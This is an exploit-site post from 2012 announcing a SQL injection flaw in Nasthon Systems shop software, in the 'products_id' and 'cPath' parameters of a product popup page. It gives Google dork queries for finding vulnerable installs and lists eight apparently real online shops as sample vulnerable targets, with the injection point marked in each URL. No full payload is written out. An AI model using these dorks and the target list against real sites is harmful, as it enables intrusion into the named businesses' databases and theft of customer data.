NasthonSystems - SQL Injection Vulnerability



EKU-ID: 1716 CVE: OSVDB-ID:
Author: TheCyberNuxbie Published: 2012-03-21 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0   [x] Official Website: http://www.1337day.com                         0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1                $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$              1
0                I'm NuxbieCyber Member From Inj3ct0r TEAM               1
1                $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1

==========================================================================
<<<:>>>        NasthonSystems - SQL Injection Vulnerability        <<<:>>>
==========================================================================
                                                          
 - Discovered By:
 ||| TheCyberNuxbie - Independent Security Research |||
 <<< staff@thecybernuxbie.com >>> YM: nux_exploit
 [ www.thecybernuxbie.com ] $ CP: +62856-2538-963

 - Info WebApps:
 This Content Develop By Nasthon Systems:
 http://www.nasthon.com/
 
 - Google Dork:
 inurl:"/nas_product_info_popup.php?products_id="
 inurl:"/nas_product_info_popup.php?cPath="
 intext:"Powered by Nasthon Systems"

 - Exploit Concept:
 http://lokalisasi/WebApps/nas_product_info_popup.php?products_id=[SQL Injection]
 http://lokalisasi/WebApps/nas_product_info_popup.php?cPath=xxx&products_id=[SQL Injection]
 
 - Sample WebApps Vuln SQLi:
 http://www.lhhtoys.com/nas_product_info_popup.php?products_id=262' + [SQL Injection]
 http://www.colourzone.hk/nas_product_info_popup.php?products_id=2491' + [SQL Injection]
 http://www.oktoys.com/osc/nas_product_info_popup.php?products_id=2436' + [SQL Injection]
 http://www.ckeshoppingmall.com.hk/nas_product_info_popup.php?products_id=289' + [SQL Injection]
 http://www.peonybeauty.com/nas_product_info_popup.php?products_id=985' + [SQL Injection]
 http://www.wellord.com/nas_product_info_popup.php?cPath=43_48&products_id=499' + [SQL Injection]
 http://www.nkok.com/nas_product_info_popup.php?cPath=267_321&products_id=3068' + [SQL Injection]
 http://www.qksport.com/nas_product_info_popup.php?cPath=49&products_id=563' + [SQL Injection]
 
 -:>>> Special Thanks <<<:-
 *** 1337day Inj3ct0r TEAM ***
 ...:::' All Member & Staff Inj3ct0r TEAM ':::...
 [ r007er, Sid3^effects, r4dc0re, CroSs, KedAns-Dz, indoushka ]
 [ SeeMe, KnocKout, ZoRLu, anT!-Tr0J4n, Kalashinkov3, Angel Injection ]
 [ cr4wl3r, team_elite, erytronic, r4h0x, cyberbag0r, Denc0plax, AlexMx ]
 [ cyberlog, donyskynet, elmonny, Hmei7, Ketek, fazzta, eidelweiss ]
 [ kaMtiEz, g3mbeL_YCL, YazidNoeha, AfniGates, Puzy_4ngeLz, Reynaey ,etc ]
 #########################################################################
  
 [ Inj3ct0r | PacketStromSecurity | Exploit-DB | Exploit-ID | Devilzc0de ]
 
 Me @ Solo Raya, 20 March 2012 @ 06:33 PM. AntiSecureCrew IT-Terminator
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$